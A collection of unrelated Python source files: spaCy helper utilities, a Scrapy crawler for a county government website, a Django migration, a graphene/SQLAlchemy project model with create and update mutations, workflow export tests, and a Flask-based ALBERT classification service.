>>> assert next(sizes) == 1 * (200.-1.) / 100
>>> assert next(sizes) == 1 + (200.-1.) / 100 + (200.-1.) / 100
"""
def clip(value):
return max(value, stop) if (start > stop) else min(value, stop)
curr = float(start)
while True:
yield clip(curr)
curr += (stop - start) / steps
def decaying(start, stop, decay):
"""Yield an infinite series of linearly decaying values."""
curr = float(start)
while True:
yield max(curr, stop)
curr -= decay
def minibatch_by_words(items, size, tuples=True, count_words=len):
"""Create minibatches of a given number of words."""
if isinstance(size, int):
size_ = itertools.repeat(size)
else:
size_ = size
items = iter(items)
while True:
batch_size = next(size_)
batch = []
while batch_size >= 0:
try:
if tuples:
doc, gold = next(items)
else:
doc = next(items)
except StopIteration:
if batch:
yield batch
return
batch_size -= count_words(doc)
if tuples:
batch.append((doc, gold))
else:
batch.append(doc)
if batch:
yield batch
def itershuffle(iterable, bufsize=1000):
"""Shuffle an iterator. This works by holding `bufsize` items back
and yielding them sometime later. Obviously, this is not unbiased –
but should be good enough for batching. Larger bufsize means less bias.
From https://gist.github.com/andres-erbsen/1307752
iterable (iterable): Iterator to shuffle.
bufsize (int): Items to hold back.
YIELDS (iterable): The shuffled iterator.
"""
iterable = iter(iterable)
buf = []
try:
while True:
for i in range(random.randint(1, bufsize - len(buf))):
buf.append(next(iterable))
random.shuffle(buf)
for i in range(random.randint(1, bufsize)):
if buf:
yield buf.pop()
else:
break
except StopIteration:
random.shuffle(buf)
while buf:
yield buf.pop()
raise StopIteration
def filter_spans(spans):
"""Filter a sequence of spans and remove duplicates or overlaps. Useful for
creating named entities (where one token can only be part of one entity) or
when merging spans with `Retokenizer.merge`. When spans overlap, the (first)
longest span is preferred over shorter spans.
spans (iterable): The spans to filter.
RETURNS (list): The filtered spans.
"""
get_sort_key = lambda span: (span.end - span.start, span.start)
sorted_spans = sorted(spans, key=get_sort_key, reverse=True)
result = []
seen_tokens = set()
for span in sorted_spans:
# Check for end - 1 here because boundaries are inclusive
if span.start not in seen_tokens and span.end - 1 not in seen_tokens:
result.append(span)
seen_tokens.update(range(span.start, span.end))
result = sorted(result, key=lambda span: span.start)
return result
def to_bytes(getters, exclude):
serialized = OrderedDict()
for key, getter in getters.items():
# Split to support file names like meta.json
if key.split(".")[0] not in exclude:
serialized[key] = getter()
return srsly.msgpack_dumps(serialized)
def from_bytes(bytes_data, setters, exclude):
msg = srsly.msgpack_loads(bytes_data)
for key, setter in setters.items():
# Split to support file names like meta.json
if key.split(".")[0] not in exclude and key in msg:
setter(msg[key])
return msg
def to_disk(path, writers, exclude):
path = ensure_path(path)
if not path.exists():
path.mkdir()
for key, writer in writers.items():
# Split to support file names like meta.json
if key.split(".")[0] not in exclude:
writer(path / key)
return path
def from_disk(path, readers, exclude):
path = ensure_path(path)
for key, reader in readers.items():
# Split to support file names like meta.json
if key.split(".")[0] not in exclude:
reader(path / key)
return path
def minify_html(html):
"""Perform a template-specific, rudimentary HTML minification for displaCy.
Disclaimer: NOT a general-purpose solution, only removes indentation and
newlines.
html (unicode): Markup to minify.
RETURNS (unicode): "Minified" HTML.
"""
return html.strip().replace(" ", "").replace("\n", "")
def escape_html(text):
"""Replace <, >, &, " with their HTML encoded representation. Intended to
prevent HTML errors in rendered displaCy markup.
text (unicode): The original text.
RETURNS (unicode): Equivalent text to be safely used within HTML.
"""
text = text.replace("&", "&")
text = text.replace("<", "<")
text = text.replace(">", ">")
text = text.replace('"', """)
return text
def use_gpu(gpu_id):
try:
import cupy.cuda.device
except ImportError:
return None
from thinc.neural.ops import CupyOps
device = cupy.cuda.device.Device(gpu_id)
device.use()
Model.ops = CupyOps()
Model.Ops = CupyOps
return device
def fix_random_seed(seed=0):
random.seed(seed)
numpy.random.seed(seed)
if cupy is not None:
cupy.random.seed(seed)
def get_json_validator(schema):
# We're using a helper function here to make it easier to change the
# validator that's used (e.g. different draft implementation), without
# having to change it all across the codebase.
# TODO: replace with (stable) Draft6Validator, if available
if jsonschema is None:
raise ValueError(Errors.E136)
return jsonschema.Draft4Validator(schema)
def validate_schema(schema):
"""Validate a given schema. This just checks if the schema itself is valid."""
validator = get_json_validator(schema)
validator.check_schema(schema)
def validate_json(data, validator):
"""Validate data against a given JSON schema (see https://json-schema.org).
data: JSON-serializable data to validate.
validator (jsonschema.DraftXValidator): The validator.
RETURNS (list): A list of error messages, if available.
"""
errors = []
for err in sorted(validator.iter_errors(data), key=lambda e: e.path):
if err.path:
err_path = "[{}]".format(" -> ".join([str(p) for p in err.path]))
else:
err_path = ""
msg = err.message + " " + err_path
if err.context: # Error has suberrors, e.g. if schema uses anyOf
suberrs = [" - {}".format(suberr.message) for suberr in err.context]
msg += ":\n{}".format("".join(suberrs))
errors.append(msg)
return errors
def get_serialization_exclude(serializers, exclude, kwargs):
"""Helper function to validate serialization args and manage transition from
keyword arguments (pre v2.1) to exclude argument.
"""
exclude = list(exclude)
# Split to support file names like meta.json
options = [name.split(".")[0] for name in serializers]
for key, value in kwargs.items():
if key in ("vocab",) and value is False:
deprecation_warning(Warnings.W015.format(arg=key))
exclude.append(key)
elif key.split(".")[0] in options:
raise ValueError(Errors.E128.format(arg=key))
# TODO: user warning?
return exclude
class SimpleFrozenDict(dict):
"""Simplified implementation of a frozen dict, mainly used as default
function or method argument (for arguments that should default to empty
dictionary). Will raise an error if user or spaCy attempts to add to dict.
"""
def __setitem__(self, key, value):
raise NotImplementedError(Errors.E095)
def pop(self, key, default=None):
raise NotImplementedError(Errors.E095)
def update(self, other):
raise NotImplementedError(Errors.E095)
class DummyTokenizer(object):
# add dummy methods for to_bytes, from_bytes, to_disk and from_disk to
# allow serialization (see #1557)
def to_bytes(self, **kwargs):
return b""
def from_bytes(self, _bytes_data, **kwargs):
return self
def to_disk(self, _path, **kwargs):
return None
def from_disk(self, _path, **kwargs):
return self
|
py | 1a40bcb2de40131281f6c7e6172442bf7720b5c8 | # -*- coding: utf-8 -*-
import scrapy
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule
from ..utils import extract_CN_from_content
from ..items import ScrapySpiderItem
import re
class A456Spider(CrawlSpider):
name = '456'
allowed_domains = ['yongshou.gov.cn']
start_urls = ['http://www.yongshou.gov.cn/html/zwgk/xxgkml/czxx/czxx/index.html']
rules = (
Rule(LinkExtractor(allow=r'/news_list\.rt\?channlId=\d+'), follow=True),
Rule(LinkExtractor(allow=r'/html/zwgk/xxgkml/[a-z]+/index.html'), follow=True),
Rule(LinkExtractor(allow=r'/html/[a-z]+/[a-z]+/\d+/\d+\.html'), callback='parse_item_1', follow=True),
Rule(LinkExtractor(allow=r'/news_list\.rt\?channlId=\d+&pageNo=\d+'), follow=True),
# Rule(LinkExtractor(allow=r'/html/[a-z]+/[a-z]+/[a-z]+/[a-z]+/\d+/\d+\.html'), callback='parse_item', follow=True),
Rule(LinkExtractor(allow=r'/html/zwgk/xxgkml/[a-z]+/\d+/\d+\.html'), callback='parse_item', follow=True),
# Rule(LinkExtractor(allow=r'/news_list\.rt\?channlCid=.*pageNo=\d+'), follow=True),
Rule(LinkExtractor(allow=r'/news_list\.rt\?channlCid=\d+&channlId=\d+&pageNo=\d+'), follow=True),
# Rule(LinkExtractor(allow=r'Items/'), callback='parse_item', follow=True),
# Rule(LinkExtractor(allow=r'Items/'), callback='parse_item', follow=True),
# Rule(LinkExtractor(allow=r'Items/'), callback='parse_item', follow=True),
)
def parse_item(self, response):
# print("############### ", response.url)
item = ScrapySpiderItem()
item['url'] = response.url
date = response.xpath('/html/body/div[5]/div/div[1]/table/tr[2]/td[6]').extract_first()
date = re.search(r"(\d{4}-\d{2}-\d{2})", date).groups()[0]
item['date'] = date
title = response.xpath('//div[@class="zwgkdetailpart2_bt"]/h1/text()').extract_first()
item['title'] = title
contents = response.xpath('//div[@class="zwgkdetailpart2_nr"]').extract()
item['contents'] = extract_CN_from_content(contents)
return item
def parse_item_1(self, response):
# print("!!!!!!!!!!!!!!!!!! ", response.url)
item = ScrapySpiderItem()
item['url'] = response.url
date = response.xpath('//div[@class="newdetailpart_fbsj"]/span[1]').extract_first()
date = re.search(r"(\d{4}-\d{2}-\d{2})", date).groups()[0]
item['date'] = date
title = response.xpath('//div[@class="newdetailpart_bt"]/h1/text()').extract_first()
item['title'] = title
contents = response.xpath('//div[@class="newdetailpart_nr"]').extract()
item['contents'] = extract_CN_from_content(contents)
return item
|
py | 1a40bd1a8ff83500163cad3816b37a738a521256 | # Generated by Django 3.2.8 on 2021-11-03 23:44
import django.contrib.postgres.fields
import django.db.models.deletion
from django.conf import settings
from django.db import migrations, models
import apps.configattribute.models
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='ConfigAttributeName',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=64, unique=True, validators=[apps.configattribute.models.validate_config_name])),
('description', models.TextField(blank=True, null=True)),
('tags', django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=24), blank=True, default=list, size=None)),
('created_on', models.DateTimeField(auto_now_add=True, verbose_name='created_on')),
('created_by', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'Configuration Attribute Name',
'verbose_name_plural': 'Configuration Attribute Names',
'ordering': ['name'],
},
),
migrations.CreateModel(
name='ConfigAttribute',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('target', models.CharField(max_length=64, validators=[apps.configattribute.models.validate_config])),
('data', models.JSONField(blank=True, null=True)),
('updated_on', models.DateTimeField(auto_now=True, verbose_name='update_on')),
('name', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='configattribute.configattributename')),
('updated_by', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'Configuration Attribute',
'verbose_name_plural': 'Configuration Attributes',
'ordering': ['target', 'name'],
'unique_together': {('target', 'name')},
},
),
]
|
py | 1a40bd2f2f77ba0cf018d1d049844719d1e8fd3c |
class Project(db.Model):
__tablename__ = 'project'
id = db.Column(UUID, primary_key=True)
c_project_id = db.Column(db.String(255))
project_name = db.Column(db.String(255))
signature_date = db.Column(db.DateTime(255))
service_commencement = db.Column(db.DateTime(255))
contract_duration_month = db.Column(db.Integer)
contract_value_usd = db.Column('contract value_usd', db.Numeric)
projected_margin_usd = db.Column(db.Numeric)
component_of_bespoke = db.Column(db.Integer)
often_provide_services = db.Column(db.Integer)
is_transition_plan = db.Column(db.Integer)
transition_plan_date = db.Column(db.DateTime(255))
is_transition_charges = db.Column(db.Integer)
transition_charges = db.Column(db.Numeric)
milestones = db.Column(db.Integer)
payment_milestones = db.Column(db.Integer)
service_credit_cap = db.Column(db.Integer)
is_transformation_plan = db.Column(db.Integer)
transformation_plan_start = db.Column(db.DateTime(255))
transformation_plan_end = db.Column(db.DateTime(255))
is_earn_back = db.Column(db.Integer)
is_customer_satisfaction_report = db.Column(db.Integer)
customer_satisfaction_form = db.Column(db.Integer)
governance_type = db.Column(db.Integer)
governance_often = db.Column(db.Integer)
key_personnel = db.Column(db.Integer)
supplier_personnel = db.Column(db.Integer)
customer_personnel = db.Column(db.Integer)
planned_negotiation_month = db.Column(db.Integer)
negotiations_month = db.Column(db.Integer)
sole_sourced = db.Column(db.Integer)
proposed_period_weeks = db.Column(db.Integer)
actual_period_weeks = db.Column(db.Integer)
is_due_diligence_completed = db.Column(db.Integer)
agreement_party = db.Column('agreement party', db.Integer)
type_of_service = db.Column(db.Integer)
currency = db.Column(db.Integer)
service_credit_cap_type = db.Column(db.Integer)
service_level_cap_percentage = db.Column(db.Numeric)
CREATED_BY = db.Column(UUID)
UPDATED_BY = db.Column(UUID)
UPDATED_AT = db.Column(db.DateTime, server_default=db.func.now())
CREATED_AT = db.Column(
db.DateTime, server_default=db.func.now(), server_onupdate=db.func.now())
class ProjectObject(SQLAlchemyObjectType):
class Meta:
model = Project
interfaces = (graphene.relay.Node, )
class ProjectInput(graphene.InputObjectType):
c_project_id = graphene.String()
project_name = graphene.String()
signature_date = graphene.types.datetime.DateTime()
service_commencement = graphene.types.datetime.DateTime()
contract_duration_month = graphene.Int()
contract_value_usd = graphene.Float()
projected_margin = graphene.Float()
component_of_bespoke = graphene.Int()
often_provide_services = graphene.Int()
is_transition_plan = graphene.Int()
transition_plan_date = graphene.types.datetime.DateTime()
is_transition_charges = graphene.Int()
transition_charges = graphene.Float()
is_transformation_plan = graphene.Int()
transformation_plan_start = graphene.types.datetime.DateTime()
transformation_plan_end = graphene.types.datetime.DateTime()
service_credit_cap = graphene.Int()
is_earn_back = graphene.Int()
is_customer_satisfaction_report = graphene.Int()
customer_satisfaction_form = graphene.Int()
governance_type = graphene.Int()
governance_often = graphene.Int()
key_personnel = graphene.Int()
supplier_personnel = graphene.Int()
customer_personnel = graphene.Int()
planned_negotiation_month = graphene.Int()
negotiations_month = graphene.Int()
sole_sourced = graphene.Int()
proposed_period_weeks = graphene.Int()
actual_period_weeks = graphene.Int()
is_due_diligence_completed = graphene.Int()
agreement_party = graphene.Int()
type_of_service = graphene.Int()
currency = graphene.Int()
service_levels_with_credit = graphene.Int()
service_level_without_credit = graphene.Int()
service_level_cap_percentage = graphene.Int()
service_credit_cap_type = graphene.Int()
class CreateProject(graphene.Mutation):
class Arguments:
project_data = ProjectInput()
ok = graphene.Boolean()
project = graphene.Field(ProjectObject)
def mutate(root, info, project_data=None):
project = Project(
c_project_id=project_data.c_project_id, project_name = project_data.project_name, signature_date=project_data.signature_date, service_commencement=project_data.service_commencement, contract_duration_month=project_data.contract_duration_month, contract_value_usd=project_data.contract_value_usd, projected_margin=project_data.projected_margin, often_provide_services=project_data.often_provide_services, is_transition_plan=project_data.is_transition_plan,
transition_plan_date=project_data.transition_plan_date,
is_transition_charges=project_data.is_transition_charges,
transition_charges=project_data.transition_charges, is_transformation_plan=project_data.is_transformation_plan, transformation_plan_start=project_data.transformation_plan_start, transformation_plan_end=project_data.transformation_plan_end, is_earn_back=project_data.is_earn_back, is_customer_satisfaction_report=project_data.is_customer_satisfaction_report, service_level_without_credit=project_data.service_level_without_credit, service_levels_with_credit=project_data.service_levels_with_credit, service_credit_cap_type=project_data.service_credit_cap_type, customer_satisfaction_form=project_data.customer_satisfaction_form, governance_type=project_data.governance_type, governance_often=project_data.governance_often, key_personnel=project_data.key_personnel, supplier_personnel=project_data.supplier_personnel, customer_personnel=project_data.customer_personnel, planned_negotiation_month=project_data.planned_negotiation_month, negotiations_month=project_data.negotiations_month, sole_sourced=project_data.sole_sourced, proposed_period_weeks=project_data.proposed_period_weeks, actual_period_weeks=project_data.actual_period_weeks, is_due_diligence_completed=project_data.is_due_diligence_completed, agreement_party = project_data.agreement_party, type_of_service = project_data.type_of_service, currency = project_data.currency, service_level_cap_percentage = project_data.service_level_cap_percentage, service_credit_cap_type = project_data.service_credit_cap_type
)
db.session.add(project)
db.session.commit()
ok = True
return CreateProject(project=project, ok=ok)
# def input_to_dictionary(input):
# """Method to convert Graphene inputs into dictionary"""
# dictionary = {}
# for key in input:
# # Convert GraphQL global id to database id
# if key[-2:] == 'id':
# input[key] = from_global_id(input[key])[1]
# dictionary[key] = input[key]
# return dictionary
from graphql_relay.node.node import from_global_id
class UpdateProjectInput(graphene.InputObjectType, ProjectInput):
id = graphene.ID(required = True)
class UpdateProject(graphene.Mutation):
project_data = UpdateProjectInput()
ok = graphene.Boolean()
project = graphene.Field(ProjectObject)
def mutate(root, info, project_data=None):
project = Project(
c_project_id=project_data.c_project_id, project_name = project_data.project_name, signature_date=project_data.signature_date, service_commencement=project_data.service_commencement, contract_duration_month=project_data.contract_duration_month, contract_value_usd=project_data.contract_value_usd, projected_margin=project_data.projected_margin, often_provide_services=project_data.often_provide_services, is_transition_plan=project_data.is_transition_plan,
transition_plan_date=project_data.transition_plan_date,
is_transition_charges=project_data.is_transition_charges,
transition_charges=project_data.transition_charges, is_transformation_plan=project_data.is_transformation_plan, transformation_plan_start=project_data.transformation_plan_start, transformation_plan_end=project_data.transformation_plan_end, is_earn_back=project_data.is_earn_back, is_customer_satisfaction_report=project_data.is_customer_satisfaction_report, service_levels_with_credit=project_data.service_levels_with_credit, service_level_without_credit=project_data.service_level_without_credit, service_credit_cap_type=project_data.service_credit_cap_type, customer_satisfaction_form=project_data.customer_satisfaction_form, governance_type=project_data.governance_type, governance_often=project_data.governance_often, key_personnel=project_data.key_personnel, supplier_personnel=project_data.supplier_personnel, customer_personnel=project_data.customer_personnel, planned_negotiation_month=project_data.planned_negotiation_month, negotiations_month=project_data.negotiations_month, sole_sourced=project_data.sole_sourced, proposed_period_weeks=project_data.proposed_period_weeks, actual_period_weeks=project_data.actual_period_weeks, is_due_diligence_completed=project_data.is_due_diligence_completed, agreement_party = project_data.agreement_party, type_of_service = project_data.type_of_service, currency = project_data.currency, service_level_cap_percentage = project_data.service_level_cap_percentage, service_credit_cap_type = project_data.service_credit_cap_type
)
db.session.update(project)
db.session.commit()
ok = True
return UpdateProject(project=project, ok=ok)
|
py | 1a40beee3a73572c1814398a45a0af360e94739b | # Copyright (C) 2018 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Tests for workflow object exports."""
from os.path import abspath, dirname, join
from flask.json import dumps
from ggrc import db
from ggrc.app import app # NOQA # pylint: disable=unused-import
from ggrc_workflows.models import Workflow, TaskGroup
from integration.ggrc import TestCase
from integration.ggrc_workflows.generator import WorkflowsGenerator
THIS_ABS_PATH = abspath(dirname(__file__))
CSV_DIR = join(THIS_ABS_PATH, 'test_csvs/')
class TestExportEmptyTemplate(TestCase):
"""Test empty export for all workflow object types."""
def setUp(self):
self.client.get("/login")
self.headers = {
'Content-Type': 'application/json',
"X-Requested-By": "GGRC",
"X-export-view": "blocks",
}
def test_single_object_export(self):
"""Test empty exports for workflow only."""
data = {
"export_to": "csv",
"objects": [{"object_name": "Workflow", "fields": "all"}]
}
response = self.client.post("/_service/export_csv",
data=dumps(data), headers=self.headers)
self.assertEqual(response.status_code, 200)
self.assertIn("Title*", response.data)
def test_multiple_objects(self):
"""Test empty exports for all workflow object in one query."""
data = [
{"object_name": "Workflow", "fields": "all"},
{"object_name": "TaskGroup", "fields": "all"},
{"object_name": "TaskGroupTask", "fields": "all"},
{"object_name": "Cycle", "fields": "all"},
{"object_name": "CycleTaskGroup", "fields": "all"},
{"object_name": "CycleTaskGroupObjectTask", "fields": "all"},
]
request_body = {
"export_to": "csv",
"objects": data
}
response = self.client.post("/_service/export_csv",
data=dumps(request_body), headers=self.headers)
self.assertEqual(response.status_code, 200)
self.assertIn("Workflow,", response.data)
self.assertIn("Task Group,", response.data)
self.assertIn("Task,", response.data)
self.assertIn("Cycle,", response.data)
self.assertIn("Cycle Task Group,", response.data)
self.assertIn("Cycle Task,", response.data)
class TestExportMultipleObjects(TestCase):
""" Test data is found in the google sheet:
https://docs.google.com/spreadsheets/d/1Jg8jum2eQfvR3kZNVYbVKizWIGZXvfqv3yQpo2rIiD8/edit#gid=2035742544
"""
CSV_DIR = join(abspath(dirname(__file__)), "test_csvs/")
def activate(self):
""" activate workflows just once after the class has been initialized
This should be in setUpClass method, but we can't access the server
context from there."""
gen = WorkflowsGenerator()
# generate cycle for the only one time wf
wf1 = Workflow.query.filter_by(status="Draft", slug="wf-1").first()
if wf1:
gen.generate_cycle(wf1)
# Only workflows with at least one task group could be activated
workflows = db.session.query(Workflow).join(TaskGroup).filter(
Workflow.id == TaskGroup.workflow_id,
Workflow.status == 'Draft').all()
for workflow in workflows:
gen.activate_workflow(workflow)
def setUp(self):
self.clear_data()
# TODO: use here such a CSV that doesn't have errors or warnings
self.import_file("workflow_big_sheet.csv", safe=False)
self.client.get("/login")
self.headers = {
'Content-Type': 'application/json',
"X-Requested-By": "GGRC",
"X-export-view": "blocks",
}
self.activate()
def export_csv(self, data):
response = super(TestExportMultipleObjects, self).export_csv(data)
self.assert200(response)
return response
def test_workflow_task_group_mapping(self):
""" test workflow and task group mappings """
data = [
{
"object_name": "Workflow", # wf-1
"filters": {
"expression": {
"op": {"name": "relevant"},
"object_name": "TaskGroup",
"slugs": ["tg-1"],
},
},
"fields": "all",
}, {
"object_name": "TaskGroup", # tg-1, tg-2
"filters": {
"expression": {
"op": {"name": "relevant"},
"object_name": "__previous__",
"ids": ["0"],
},
},
"fields": "all",
},
]
response = self.export_csv(data).data
self.assertEqual(3, response.count("wf-1")) # 1 for wf and 1 on each tg
self.assertIn("tg-1", response)
self.assertIn("tg-6", response)
def test_tg_task(self):
""" test task group and task mappings """
data = [
{
"object_name": "TaskGroupTask", # task-1, task-7
"filters": {
"expression": {
"op": {"name": "relevant"},
"object_name": "TaskGroup",
"slugs": ["tg-1"],
},
},
"fields": "all",
}, {
"object_name": "TaskGroup", # tg-1, tg-2
"filters": {
"expression": {
"op": {"name": "relevant"},
"object_name": "__previous__",
"ids": ["0"],
},
},
"fields": "all",
},
]
response = self.export_csv(data).data
self.assertEqual(3, response.count("tg-1")) # 2 for tasks and 1 for tg
self.assertIn("task-1", response)
self.assertIn("task-7", response)
def test_workflow_cycle_mapping(self):
""" test workflow and cycle mappings """
data = [
{
"object_name": "Cycle", # cycle with title wf-1
"filters": {
"expression": {
"op": {"name": "relevant"},
"object_name": "Workflow",
"slugs": ["wf-1"],
},
},
"fields": "all",
}, {
"object_name": "Workflow", # wf-1
"filters": {
"expression": {
"op": {"name": "relevant"},
"object_name": "__previous__",
"ids": ["0"],
},
},
"fields": "all",
}, {
"object_name": "CycleTaskGroup", # two cycle groups
"filters": {
"expression": {
"op": {"name": "relevant"},
"object_name": "__previous__",
"ids": ["0"],
},
},
"fields": "all",
}, {
"object_name": "Cycle", # sholud be same cycle as in first block
"filters": {
"expression": {
"op": {"name": "relevant"},
"object_name": "__previous__",
"ids": ["2"],
},
},
"fields": "all",
}, {
# Task mapped to any of the two task groups, 3 tasks
"object_name": "CycleTaskGroupObjectTask",
"filters": {
"expression": {
"op": {"name": "relevant"},
"object_name": "__previous__",
"ids": ["2"],
},
},
"fields": "all",
}, {
"object_name": "CycleTaskGroup", # two cycle groups
"filters": {
"expression": {
"op": {"name": "relevant"},
"object_name": "__previous__",
"ids": ["4"],
},
},
"fields": "all",
},
]
response = self.export_csv(data).data
self.assertEqual(3, response.count("wf-1")) # 2 for cycles and 1 for wf
# 3rd block = 2, 5th block = 3, 6th block = 2.
self.assertEqual(7, response.count("CYCLEGROUP-"))
self.assertEqual(9, response.count("CYCLE-"))
self.assertEqual(3, response.count("CYCLETASK-"))
def test_cycle_taks_objects(self):
""" test cycle task and various objects """
data = [
{
"object_name": "CycleTaskGroupObjectTask", #
"filters": {
"expression": {
"op": {"name": "relevant"},
"object_name": "Policy",
"slugs": ["p1"],
},
},
"fields": "all",
}, {
"object_name": "Policy", #
"filters": {
"expression": {
"op": {"name": "relevant"},
"object_name": "__previous__",
"ids": ["0"],
},
},
"fields": ["slug", "title"],
},
]
response = self.export_csv(data).data
self.assertEqual(2, response.count("CYCLETASK-"))
self.assertEqual(3, response.count(",p1,"))
def test_wf_indirect_relevant_filters(self):
""" test related filter for indirect relationships on wf objects """
def block(obj):
return {
"object_name": obj,
"fields": ["slug"],
"filters": {
"expression": {
"object_name": "Policy",
"op": {"name": "relevant"},
"slugs": ["p1"],
},
},
}
data = [
block("Workflow"),
block("Cycle"),
block("CycleTaskGroup"),
block("CycleTaskGroupObjectTask"),
]
response = self.export_csv(data).data
wf = Workflow.query.filter_by(slug="wf-1").first()
cycle = wf.cycles[0]
cycle_tasks = []
for cycle_task in cycle.cycle_task_group_object_tasks:
is_related = False
for related_object in cycle_task.related_objects():
if related_object.slug == "p1":
is_related = True
if is_related:
cycle_tasks.append(cycle_task)
cycle_task_groups = list({cycle_task.cycle_task_group
for cycle_task in cycle_tasks})
self.assertEqual(1, response.count("wf-"))
self.assertRegexpMatches(response, ",{}[,\r\n]".format(wf.slug))
self.assertEqual(1, response.count("CYCLE-"))
self.assertRegexpMatches(response, ",{}[,\r\n]".format(cycle.slug))
self.assertEqual(1, response.count("CYCLEGROUP-"))
self.assertEqual(1, len(cycle_task_groups))
self.assertRegexpMatches(response, ",{}[,\r\n]".format(
cycle_task_groups[0].slug))
self.assertEqual(2, response.count("CYCLETASK-"))
self.assertEqual(2, len(cycle_tasks))
for cycle_task in cycle_tasks:
self.assertRegexpMatches(response, ",{}[,\r\n]".format(
cycle_task.slug))
destinations = [
("Workflow", wf.slug, 3),
("Cycle", cycle.slug, 3),
("CycleTaskGroupObjectTask", cycle_tasks[0].slug, 1),
("CycleTaskGroupObjectTask", cycle_tasks[1].slug, 1),
]
for object_name, slug, count in destinations:
data = [{
"object_name": "Policy",
"fields": ["slug"],
"filters": {
"expression": {
"object_name": object_name,
"op": {"name": "relevant"},
"slugs": [slug],
},
},
}]
response = self.export_csv(data).data
self.assertEqual(count, response.count(",p"), "Count for " + object_name)
self.assertIn(",p1", response)
|
py | 1a40beefac41dec9595ad2bf76c0f785916e251a | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2020/12/23 4:56 下午
# @File : main.trainer_predict_api.py
# @Author: johnson
# @Contact : github: johnson7788
# @Desc :
import logging
logging.basicConfig(
format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt='%Y/%m/%d %H:%M:%S',
level=logging.INFO,
)
logger = logging.getLogger("Main")
import os, random, time
import numpy as np
import torch
from transformers import AlbertConfig
from pytorch_pretrained_bert import BertTokenizer
from modeling import AlbertSPC, BertForGLUESimpleAdaptorTraining
from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler, DistributedSampler
from tqdm import tqdm
from utils_glue import InputExample, convert_examples_to_features
import argparse
from flask import Flask, request, jsonify, abort
######################################################
# 使用没有蒸馏的模型预测,改造成一个flask api,
######################################################
app = Flask(__name__)
def load_examples(contents, max_seq_length, tokenizer, label_list):
"""
:param contents: eg: [('苹果很好用', '苹果')]
:param max_seq_length:
:param tokenizer: 初始化后的tokenizer
:param label_list:
:return:
"""
examples = []
for guid, content in enumerate(contents):
sentence, aspect = content
examples.append(
InputExample(guid=guid, text_a=sentence, text_b=aspect))
features = convert_examples_to_features(examples, label_list, max_seq_length, tokenizer,
output_mode="classification",
cls_token_segment_id=0, pad_token_segment_id=0)
all_input_ids = torch.tensor([f.input_ids for f in features], dtype=torch.long)
all_input_mask = torch.tensor([f.input_mask for f in features], dtype=torch.long)
all_segment_ids = torch.tensor([f.segment_ids for f in features], dtype=torch.long)
dataset = TensorDataset(all_input_ids, all_input_mask, all_segment_ids)
return dataset
class TorchAsBertModel(object):
def __init__(self, verbose=0):
self.verbose = verbose
self.label_list = ["是", "否"]
self.num_labels = len(self.label_list)
# 判断使用的设备
self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
self.n_gpu = torch.cuda.device_count() if torch.cuda.is_available() else 0
self.tokenizer, self.model = self.load_model()
# 句子左右最大truncate序列长度
self.left_max_seq_len = 15
self.right_max_seq_len = 20
self.aspect_max_seq_len = 30
def load_model(self):
parser = argparse.ArgumentParser()
args = parser.parse_args()
args.output_encoded_layers = True
args.output_attention_layers = True
args.output_att_score = True
args.output_att_sum = True
self.args = args
# 解析配置文件, 教师模型和student模型的vocab是不变的
self.vocab_file = "albert_model/vocab.txt"
# 这里是使用的teacher的config和微调后的teacher模型, 也可以换成student的config和蒸馏后的student模型
# student config: config/chinese_bert_config_L4t.json
# distil student model: distil_model/gs8316.pkl
self.bert_config_file_S = "albert_model/config.json"
self.tuned_checkpoint_S = "trained_teacher_model/test_components.pkl"
self.max_seq_length = 70
# 预测的batch_size大小
self.predict_batch_size = 64
# 加载student的配置文件, 校验最大序列长度小于我们的配置中的序列长度
bert_config_S = AlbertConfig.from_json_file(self.bert_config_file_S)
bert_config_S.num_labels = self.num_labels
# 加载tokenizer
tokenizer = BertTokenizer(vocab_file=self.vocab_file)
# 加载模型
model_S = AlbertSPC(bert_config_S)
state_dict_S = torch.load(self.tuned_checkpoint_S, map_location=self.device)
model_S.load_state_dict(state_dict_S)
if self.verbose:
print("模型已加载")
return tokenizer, model_S
def truncate(self, input_text, max_len, trun_post='post'):
"""
实施截断数据
:param input_text:
:param max_len: eg: 15
:param trun_post: 截取方向,向前还是向后截取,
"pre":截取前面的, "post":截取后面的
:return:
"""
if max_len is not None and len(input_text) > max_len:
if trun_post == "post":
return input_text[-max_len:]
else:
return input_text[:max_len]
else:
return input_text
def clean(self, text_left, aspect, text_right):
"""
截断数据
:param text_left:
:param aspect:
:param text_right:
:return:
"""
text_left = self.truncate(text_left, self.left_max_seq_len)
aspect = self.truncate(aspect, self.aspect_max_seq_len)
text_right = self.truncate(text_right, self.right_max_seq_len, trun_post="pre")
return text_left, aspect, text_right
def predict_batch(self, data):
"""
batch_size数据处理
:param data: 是一个要处理的数据列表
:return:
"""
contents = []
for one_data in data:
content, aspect, aspect_start, aspect_end = one_data
text_left = content[:aspect_start]
text_right = content[aspect_end:]
text_left, aspect, text_right = self.clean(text_left, aspect, text_right)
new_content = text_left + aspect + text_right
contents.append((new_content, aspect))
eval_dataset = load_examples(contents, self.max_seq_length, self.tokenizer, self.label_list)
if self.verbose:
print("评估数据集已加载")
res = self.do_predict(self.model, eval_dataset)
if self.verbose:
print(f"预测的结果是: {res}, {[self.label_list[id] for id in res]}")
# TODO 输入为一条数据,返回也只返回一条结果即可以了
return res
def predict_batch_without_turncate(self, data):
"""
batch_size数据处理
:param data: 是一个要处理的数据列表[(content,aspect),...,]
:return:
"""
eval_dataset = load_examples(data, self.max_seq_length, self.tokenizer, self.label_list)
